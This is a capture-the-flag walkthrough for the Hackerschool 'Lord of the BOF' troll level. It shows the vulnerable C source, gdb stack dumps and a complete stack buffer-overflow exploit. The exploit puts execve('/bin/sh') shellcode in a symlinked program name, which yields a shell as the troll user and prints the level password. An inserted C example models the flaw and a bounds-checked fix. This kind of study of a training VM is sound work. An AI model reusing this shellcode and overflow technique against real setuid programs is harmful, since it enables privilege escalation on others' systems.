

Hackerschool LOB (orge -> troll) by ORANG

LOB_orge

 

 [orge@localhost orge]$ bash2

[orge@localhost orge]$ ls

troll  troll.c

[orge@localhost orge]$ cat troll.c

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* added here: memset, strlen, strcpy are declared in string.h */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more!
        memset(argv[1], 0, strlen(argv[1]));
}

 

After starting bash2~~ let's look at the hint first.

Hmm, an egg hunter, a buffer hunter, an argv[1] hunter?, and on top of that argc has to be exactly 2.

Using argv[2] had been so convenient until now.. looks like I need to find another way.


Looking at the process memory layout, you can see that the stack region holds argc, argv, env, and "etc". In this challenge, however, both env and argv get wiped.. so let's analyze with gdb and look at the "etc" part.

 

 (gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push   %ebp

0x8048501 <main+1>: mov    %esp,%ebp

0x8048503 <main+3>: sub    $0x2c,%esp

...omitted...

0x804863a <main+314>: add    $0xc,%esp

0x804863d <main+317>: leave

0x804863e <main+318>: ret

 

The user address space is 0x08048000 ~ 0xBFFFFFFF, so I'll start at 0xBFFFFFFF and work upward from there.

Set a breakpoint at main+3 and take a look.

 

 (gdb) b * main+3

Breakpoint 1 at 0x8048503

(gdb) r AAAA

Starting program: /home/orge/tmp/./troll AAAA


Breakpoint 1, 0x8048503 in main ()

(gdb) x/200x 0xbfffffff-500

0xbffffe0b: 0x6d6f682f 0x726f2f65 0x742f6567 0x5300706d

0xbffffe1b: 0x4c564c48 0x4c00323d 0x4f435f53 0x53524f4c

0xbffffe2b: 0x3d6f6e3d 0x663a3030 0x30303d69 0x3d69643a

0xbffffe3b: 0x333b3130 0x6e6c3a34 0x3b31303d 0x703a3633

0xbffffe4b: 0x30343d69 0x3a33333b 0x303d6f73 0x35333b31

0xbffffe5b: 0x3d64623a 0x333b3034 0x31303b33 0x3d64633a

0xbffffe6b: 0x333b3034 0x31303b33 0x3d726f3a 0x303b3130

0xbffffe7b: 0x37333b35 0x3a31343b 0x303d696d 0x35303b31

0xbffffe8b: 0x3b37333b 0x653a3134 0x31303d78 0x3a32333b

0xbffffe9b: 0x6d632e2a 0x31303d64 0x3a32333b 0x78652e2a

0xbffffeab: 0x31303d65 0x3a32333b 0x6f632e2a 0x31303d6d

0xbffffebb: 0x3a32333b 0x74622e2a 0x31303d6d 0x3a32333b

0xbffffecb: 0x61622e2a 0x31303d74 0x3a32333b 0x68732e2a

0xbffffedb: 0x3b31303d 0x2a3a3233 0x6873632e 0x3b31303d

0xbffffeeb: 0x2a3a3233 0x7261742e 0x3b31303d 0x2a3a3133

0xbffffefb: 0x7a67742e 0x3b31303d 0x2a3a3133 0x6a72612e

0xbfffff0b: 0x3b31303d 0x2a3a3133 0x7a61742e 0x3b31303d

0xbfffff1b: 0x2a3a3133 0x687a6c2e 0x3b31303d 0x2a3a3133

0xbfffff2b: 0x70697a2e 0x3b31303d 0x2a3a3133 0x303d7a2e

0xbfffff3b: 0x31333b31 0x5a2e2a3a 0x3b31303d 0x2a3a3133

0xbfffff4b: 0x3d7a672e 0x333b3130 0x2e2a3a31 0x3d327a62

0xbfffff5b: 0x333b3130 0x2e2a3a31 0x303d7a62 0x31333b31

0xbfffff6b: 0x742e2a3a 0x31303d7a 0x3a31333b 0x70722e2a

0xbfffff7b: 0x31303d6d 0x3a31333b 0x70632e2a 0x303d6f69

0xbfffff8b: 0x31333b31 0x6a2e2a3a 0x303d6770 0x35333b31

0xbfffff9b: 0x672e2a3a 0x303d6669 0x35333b31 0x622e2a3a

0xbfffffab: 0x303d706d 0x35333b31 0x782e2a3a 0x303d6d62

0xbfffffbb: 0x35333b31 0x782e2a3a 0x303d6d70 0x35333b31

0xbfffffcb: 0x702e2a3a 0x303d676e 0x35333b31 0x742e2a3a

0xbfffffdb: 0x303d6669 0x35333b31 0x682f003a 0x2f656d6f

0xbfffffeb: 0x6567726f 0x706d742f 0x742f2e2f 0x6c6c6f72

0xbffffffb: 0x00000000 Cannot access memory at address 0xbfffffff


Something is packed densely right up to the end of the user address space. Let's look at the contents.


 (gdb) x/100s 0xbfffffff-1000

0xbffffc17:  ""

0xbffffc18:  ""

0xbffffc19:  ""

0xbffffc1a:  ""

0xbffffc1b:  ""

0xbffffc1c:  ""

0xbffffc1d:  ""

0xbffffc1e:  "i686"

0xbffffc23:  "/home/orge/tmp/./troll"

0xbffffc3a:  "AAAA"

0xbffffc3f:  "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffc61:  "USERNAME="

0xbffffc6b:  "HISTSIZE=1000"

0xbffffc79:  "HOSTNAME=localhost.localdomain"

0xbffffc98:  "LOGNAME=orge"

0xbffffca5:  "MAIL=/var/spool/mail/orge"

0xbffffcbf:  "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcde:  "TERM=xterm-color"

0xbffffcef:  "HOSTTYPE=i386"

0xbffffcfd:  "PATH=/bin:/usr/bin:/usr/local/bin:/usr/bin/X11:/usr/X11R6/bin:/home/orge/bin"

0xbffffd4a:  "OLDPWD=/home/orge"

0xbffffd5c:  "HOME=/home/orge"

0xbffffd6c:  "INPUTRC=/etc/inputrc"

0xbffffd81:  "SHELL=/bin/bash"

0xbffffd91:  "USER=orge"

0xbffffd9b:  "BASH_ENV=/home/orge/.bashrc"

0xbffffdb7:  "DISPLAY=/tmp/launch-SS2sdZ/org.macosforge.xquartz:0"

0xbffffdeb:  "LANG=en_US"

0xbffffdf6:  "OSTYPE=linux-gnu"

0xbffffe07:  "PWD=/home/orge/tmp"

0xbffffe1a:  "SHLVL=2"

0xbffffe22:  "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

0xbffffeea:  ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...

---Type <return> to continue, or q <return> to quit---

0xbfffffb2:  "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"

0xbfffffe5:  "/home/orge/tmp/./troll"

0xbffffffc:  ""

0xbffffffd:  ""

0xbffffffe:  ""

0xbfffffff:  ""

0xc0000000:  <Address 0xc0000000 out of bounds>

0xc0000000:  <Address 0xc0000000 out of bounds>

0xc0000000:  <Address 0xc0000000 out of bounds>

 

It holds the environment variables and also the name of the executable (the command). Since the breakpoint is early in the function, the environment variables have not been wiped yet.

Set a breakpoint at main+317 and check again...

 

 (gdb) b * main+317

Breakpoint 2 at 0x804863d

(gdb) r `perl -e 'print "A"x44,"BBB\xbf"'`

Starting program: /home/orge/tmp/./troll `perl -e 'print "A"x44,"BBB\xbf"'`


Breakpoint 1, 0x8048503 in main ()

(gdb) n

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB


Breakpoint 2, 0x804863d in main ()

(gdb) x/200s 0xbfffffff-200

...omitted...

0xbfffffdf:  ""

0xbfffffe0:  ""

0xbfffffe1:  ""

0xbfffffe2:  ""

0xbfffffe3:  ""

0xbfffffe4:  ""

0xbfffffe5:  "/home/orge/tmp/./troll"

0xbffffffc:  ""

0xbffffffd:  ""

0xbffffffe:  ""

0xbfffffff:  ""

0xc0000000:  <Address 0xc0000000 out of bounds>

0xc0000000:  <Address 0xc0000000 out of bounds>

0xc0000000:  <Address 0xc0000000 out of bounds>

 

Oh? Something is left over. The command name (the executable path) is still there!!

So this is the part to attack through. I'll use the symbolic-link trick from the previous level.
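The security-relevant gap in troll.c, shown as an added example that is not part of the LOB source or of this walkthrough: the hunters zero every environ string and argv[1] but never argv[0], and the length check admits 48 bytes into a 40-byte buffer. The C below models both behaviours on constructed argv/environ arrays (the struct, the "./troll", "AAAA" and "HOME=/home/orge" strings, and every function name are assumptions made for the example) next to a bounds-checked copy that refuses anything that does not fit.

```c
/* Added example (not from the LOB source): models troll.c's two "hunter"
 * mitigations and a hardened length check on constructed argv/environ
 * arrays, so the gap can be inspected without running the vulnerable binary. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* troll's char buffer[40] */

/* Builds a string of n 'A' bytes in static storage (constructed input). */
const char *a_string(size_t n)
{
    static char buf[64];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* troll's own check: up to 48 bytes pass, 8 more than buffer[40] can hold. */
int troll_accepts(const char *arg)
{
    return strlen(arg) <= 48;
}

/* Hardened copy: the string and its NUL must fit, otherwise refuse.
 * Returns 1 when copied, 0 when rejected. */
int hardened_copy(char *dst, size_t dstsz, const char *src)
{
    size_t len = strlen(src);
    if (len >= dstsz)
        return 0;
    memcpy(dst, src, len + 1);
    return 1;
}

/* Wrapper so the outcome for an n-byte argument can be checked directly. */
int copy_into_buffer(size_t n)
{
    char buffer[BUF_SIZE];
    return hardened_copy(buffer, sizeof buffer, a_string(n));
}

/* Constructed stand-in for the strings the kernel places at the top of the
 * stack: argv[0], argv[1] and one environment string, in writable storage. */
struct proc_strings {
    char arg0[32], arg1[32], env0[32];
    char *argv[3];
    char *envp[2];
};

void init_strings(struct proc_strings *p)
{
    strcpy(p->arg0, "./troll");          /* program name, argv[0] (assumed) */
    strcpy(p->arg1, "AAAA");             /* the one argument troll requires */
    strcpy(p->env0, "HOME=/home/orge");  /* sample environment string */
    p->argv[0] = p->arg0; p->argv[1] = p->arg1; p->argv[2] = NULL;
    p->envp[0] = p->env0; p->envp[1] = NULL;
}

/* troll's hunters as written in troll.c: every environ string is zeroed,
 * then argv[1]. argv[0] is never touched. */
void troll_hunters(char **envp, int argc, char **argv)
{
    int i;
    for (i = 0; envp[i]; i++)
        memset(envp[i], 0, strlen(envp[i]));
    if (argc > 1)
        memset(argv[1], 0, strlen(argv[1]));
}

/* Complete wipe of every argv string, argv[0] included. This only closes the
 * leftover found above; the bounds check in hardened_copy is the real fix. */
void wipe_all_strings(char **envp, int argc, char **argv)
{
    int i;
    for (i = 0; envp[i]; i++)
        memset(envp[i], 0, strlen(envp[i]));
    for (i = 0; i < argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
}

/* Non-NUL bytes left in the three strings after troll's hunters run. */
size_t left_after_troll_hunters(void)
{
    struct proc_strings p;
    init_strings(&p);
    troll_hunters(p.envp, 2, p.argv);
    return strlen(p.arg0) + strlen(p.arg1) + strlen(p.env0);
}

/* The same measurement after the complete wipe. */
size_t left_after_full_wipe(void)
{
    struct proc_strings p;
    init_strings(&p);
    wipe_all_strings(p.envp, 2, p.argv);
    return strlen(p.arg0) + strlen(p.arg1) + strlen(p.env0);
}

int main(void)
{
    printf("48-byte arg: troll accepts=%d, hardened copy=%d\n",
           troll_accepts(a_string(48)), copy_into_buffer(48));
    printf("bytes left after troll's hunters: %zu\n", left_after_troll_hunters());
    printf("bytes left after full wipe: %zu\n", left_after_full_wipe());
    return 0;
}
```

Compile with cc -std=c99 and run: troll-style hunters leave the 7 bytes of argv[0] intact, while the bounds-checked copy refuses the 48-byte argument that troll.c copies into its 40-byte buffer. Zeroing leftover strings is defense in depth at best; the check before the copy is what removes the overflow.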

 

...I accidentally deleted the troll file, so I'm continuing after resetting the LOB VM... T_T

 

 [orge@localhost tmp]$ ln -s troll `perl -e 'print "AA","\x90"x100,"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

ln: cannot create symbolic link `AA11̀E1F̀1Ph//shh/binPS°

     ̀' to `troll': No such file or directory

I tried to create the link, but it didn't work. Looking into it, the cause was the '\x2f' in the shellcode: '\x2f' is interpreted as '/'. So I'll try again with shellcode that contains no '\x2f'.


[orge@localhost tmp]$ ln -s troll `perl -e 'print "AA","\x90"x100,"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[orge@localhost tmp]$ ls

AA????????????????????????????????????????????????????????????????????????????????????????????????????t$?i])ɱ?1E??E???b??|?G?Rp??8{?Q????-ѶO?4@QM?

troll

 

This time the link was created successfully!!

Since I don't know the address yet, I'll trigger a segfault and look at the core dump.

 

[orge@localhost tmp]$ ./`perl -e 'print "AA", "\x90"x100, "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"BBB\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB

Segmentation fault (core dumped)

 

(gdb) x/200x 0xbfffffff-200

0xbfffff37: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff47: 0x00000000 0x2f2e0000 0x90904141 0x90909090

0xbfffff57: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff67: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff77: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff87: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff97: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffffa7: 0x90909090 0x90909090 0x90909090 0xc5d99090

0xbfffffb7: 0xf42474d9 0x69c315b8 0xc9295dd7 0x45310bb1

0xbfffffc7: 0x1a45031a 0xe204c583 0x8f62a9e0 0x47137c93

0xbfffffd7: 0x7052e38e 0x1717ccb8 0x85f77b38 0xa98e1551

0xbfffffe7: 0x2d9801f3 0x4fb6d1f3 0xfce7bf9a 0x51af4034

0xbffffff7: 0xd682a14d 0x00000000 Cannot access memory at address 

 

I'll aim with plenty of margin, at around 0xbfffff67~~

 

 [orge@localhost tmp]$ ./`perl -e 'print "AA", "\x90"x100, "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"\x67\xff\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg

bash$ id

uid=507(orge) gid=507(orge) groups=507(orge)

bash$ exit

exit

[orge@localhost tmp]$ cd ..

[orge@localhost orge]$ ln -s troll `perl -e 'print "AA", "\x90"x100, "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[orge@localhost orge]$ ls

AA????????????????????????????????????????????????????????????????????????????????????????????????????t$?i])ɱ?1E??E???b??|?G?Rp??8{?Q????-ѶO?4@QM?

tmp

troll

troll.c

[orge@localhost orge]$ ./`perl -e 'print "AA","\x90"x100,"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `perl -e 'print "A"x44,"\x67\xff\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg

bash$ id

uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)

bash$ my-pass

euid = 508

aspirin

 

I wasted far too much time on deleting the troll file halfway through and on the shellcode problem T_T

VM snapshots really are a must..!!